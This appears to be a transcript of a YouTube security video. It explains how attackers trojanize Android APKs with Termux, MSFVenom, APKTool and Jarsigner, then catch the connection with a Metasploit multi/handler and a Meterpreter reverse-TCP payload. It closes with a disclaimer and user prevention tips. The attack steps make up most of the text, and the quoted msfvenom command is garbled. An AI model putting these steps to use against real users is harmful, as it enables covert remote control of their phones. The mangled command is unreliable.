Welcome back to our YouTube channel. Today, we have an important topic to discuss: how hackers can use Termux and various tools to inject payloads into original APK files. We'll explain the tools involved, walk you through the injection process, demonstrate how to exploit the malicious application using MSFConsole, and provide preventive measures to protect against such attacks. Let's get started. Let's begin by introducing the tools involved in the payload injection process. We'll cover MSFVenom, APKTool, Zipalign, Jarsigner, and MSFConsole. MSFVenom is a powerful payload generator from the Metasploit framework. It allows attackers to create various types of payloads, including reverse shells, backdoors, and other malicious code. APKTool is a utility that enables the decompilation and recompilation of Android APK files. It allows attackers to extract the APK's resources, manifest, and source code. Zipalign is an Android tool used to optimize APK files for better performance. Attackers may use it to align and prepare the modified APK for installation. Jarsigner is a Java tool used to sign JAR files, including Android APKs. Attackers can sign the modified APK with a self-generated digital signature to make it appear legitimate. MSFConsole is the command line interface for the Metasploit framework. It provides a powerful set of tools for penetration testing and exploitation. Let's now walk through the process of injecting payloads using MSFVenom in Termux. The following command is commonly used. Command, msvenom.apk/p/android/tcp/localhost:\_ip_address/port=\_port/output.apk. In this command, original.apk refers to the target app you want to modify, and output.apk is the name of the resulting malicious APK. Localhost represents the attacker's IP address, and port is the port used for the reverse TCP connection. Once the payload is injected and the malicious APK is created, the attacker will attempt to distribute it. They may use various methods such as social engineering, phishing emails, or compromised app stores to trick users into downloading and installing the app. To exploit the malicious application, the attacker will utilize MSFConsole. They would set up a listener for the reverse TCP connection by running specific commands within MSFConsole. Launching MSFConsole. Open a terminal or command prompt window. Type MSFConsole and press Enter to launch the Metasploit Framework console. Selecting an exploit. Choose an exploit that matches your target and vulnerability. Use the use command followed by the exploit's full path to select it. For example, use exploit/multi/handler. Configuring the exploit. Depending on the selected exploit, you may need to set specific options such as the target IP address, port, or payload. Use the show options command to view and configure the required options. Setting up the payload. A payload is the code that will be executed on the target system once the exploit is successful. Use the show payloads command to list available payloads. Select an appropriate payload using the set payload command followed by the payload name. For example, set payload android/meterpreter/reverse_tcp. Setting up the listener. To establish a reverse TCP connection back to your machine, you need to set up a listener. Use the show options command to view the available listener options. Configure the required options such as the local host and port. Use the set command to set the listener options accordingly. For example, set localhost followed by attacker IP and set port followed by attacker port. Exploiting the target. Once the exploit and payload are configured, you can initiate the attack by running the exploit or run command. MSFConsole will attempt to exploit the target system using the specified payload and establish a reverse TCP connection. Please remember that using these techniques without proper authorization is illegal and unethical. This information is intended for educational purposes only, to increase awareness of potential security risks and to promote responsible and ethical security practices. Always ensure you have the necessary permissions and adhere to applicable laws and regulations when conducting security assessments or penetration testing. Let's now discuss preventive measures to protect against payload injection attacks. App source verification: download apps only from trusted sources, such as official app stores, and avoid sideloading apps from unknown or untrusted sources. Regular updates: keep your device and apps up to date with the latest security patches and bug fixes. Developers often release updates to address vulnerabilities that attackers can exploit. App permissions: be cautious when granting app permissions. Review the permissions requested by apps and only grant necessary permissions for their intended functionality. App reputation: check the reputation and reviews of an app before installing it. Look for any suspicious or negative feedback from other users. Antivirus and security software: install reputable antivirus and security software on your device. These tools can help detect and block malicious apps and payloads. User education: stay informed about the latest security threats and best practices. Educate yourself and others on safe app usage and the risks associated with installing apps from unknown sources. That wraps up our discussion on payload injection using Termux and related tools, exploitation with MSFConsole, and preventive measures to protect against such attacks. Remember, staying vigilant and implementing security measures are key to keeping your devices and personal information safe. We hope you found this information helpful. If you have any questions or suggestions, please leave them in the comments section below. Don't forget to subscribe to our channel for more informative videos on cybersecurity and stay updated with the latest trends. Thank you for watching, and until next time, stay safe and secure.